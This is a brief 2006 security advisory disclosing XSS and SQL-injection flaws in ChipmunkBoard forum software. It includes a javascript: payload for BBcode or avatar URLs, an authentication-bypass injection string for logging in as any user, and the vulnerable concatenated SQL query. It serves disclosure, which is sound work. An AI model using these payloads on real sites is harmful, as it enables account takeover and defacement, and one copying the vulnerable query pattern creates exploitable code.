ChipmunkBoard Multiple Attack vectors
Discovered by: Nomenumbra
Date: 6/4/2006
impact:high (privilege escalation,possible defacement)
It is possible to insert the following javascript in the BBcode or supply it as
your avatar url:
javascript:alert(%27xss%27);
Also ChipmunkBoard is prone to SQL-injection, provided magic_quotes is turned
off.
SQL injection is as follows (quite odd), replace whateveruser with the username
you want to log in as:
a' or ('1' = '1' AND username = 'whateveruser') or '2' = '2
The vulnerable code lies in:
$query = "select * from b_users where username='$username' and
password='$password' and validated='1'";
Nomenumbra/[0x4F4C]
